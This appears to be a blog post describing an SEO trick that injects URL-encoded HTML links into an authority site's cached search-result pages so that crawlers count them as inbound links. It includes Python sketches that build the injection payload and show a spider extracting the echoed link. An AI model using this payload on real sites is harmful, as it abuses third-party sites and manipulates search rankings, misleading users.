Search engines such as Google have folded a number of citation-based criteria into their algorithms over the past year; one example is Hilltop, a technique described in an academic whitepaper. Citation-based ranking is a good starting point for quality search results, but the citation nature of Google, combined with the search functions and caching of large, prominent authority sites, can in fact be exploited.
Here is an example:
- A series of pages is created on a domain, say www.mylittlewebsite.com, with links pointing to a search request on one of these authority sites. For example: copy the link URL and paste it into your address bar to see what I mean; it's loooong.
- Notice the formatting: the link is hex-encoded (URL-encoded), so when it is wrapped in a standard HREF tag and the request is made to the authority website's search POST, the query survives intact and is rendered back as basic HTML on the results page. It's a clever encoding trick (see the first sketch after this list).
- Obviously the request produces a negative (empty) search result on the authority website; the catch is that certain site searches cache every local search result page, successful or otherwise.
- If those cached search results are spiderable content, then a robot such as Googlebot will crawl them and see inbound links from a high-profile authority site pointing to the domain in question (see the second sketch below).
- The result: www.mylittlewebsite.com jumps in the rankings.
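To make the encoding trick concrete, here is a minimal sketch in Python of how such a link could be built. The search endpoint, the `q` parameter, and the target domain are all hypothetical placeholders, and the request is sketched as a GET query string for simplicity (the exploit above goes through a search POST, but the hex-encoding point is the same):

```python
from urllib.parse import quote

# Hypothetical names: the authority site's search endpoint and the
# target domain are placeholders, not real services.
SEARCH_ENDPOINT = "http://www.bigauthoritysite.com/search"
TARGET = "www.mylittlewebsite.com"

# The "query" smuggled into the search request is itself a snippet of
# HTML containing a link back to the target domain. Hex escapes
# (%3C for '<', %22 for '"', and so on) keep the snippet intact
# inside the URL until the search page echoes it back as raw HTML.
payload = '<a href="http://{0}">{0}</a>'.format(TARGET)
link = "{}?q={}".format(SEARCH_ENDPOINT, quote(payload, safe=""))

print(link)  # a long, fully percent-encoded URL - hence "loooong" above
```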
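And for the other half of the trick, a sketch of why the cached page matters: to a spider, a link echoed back in a cached "no results" page is indistinguishable from an ordinary editorial link. The `cached_page` string below is fabricated for illustration:

```python
from html.parser import HTMLParser

class LinkExtractor(HTMLParser):
    """Collects href targets the way a spider would when indexing a page."""
    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.links.extend(v for k, v in attrs if k == "href")

# A fabricated cached "no results" page that echoes the query back unescaped.
cached_page = """
<html><body>
<p>No results found for:
<a href="http://www.mylittlewebsite.com">www.mylittlewebsite.com</a></p>
</body></html>
"""

parser = LinkExtractor()
parser.feed(cached_page)
print(parser.links)  # ['http://www.mylittlewebsite.com'] - an "inbound link"
                     # from the authority domain, as far as a robot can tell
```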
Now, how long will it take Google to patch this hole in their algorithm? Not long, I would guess.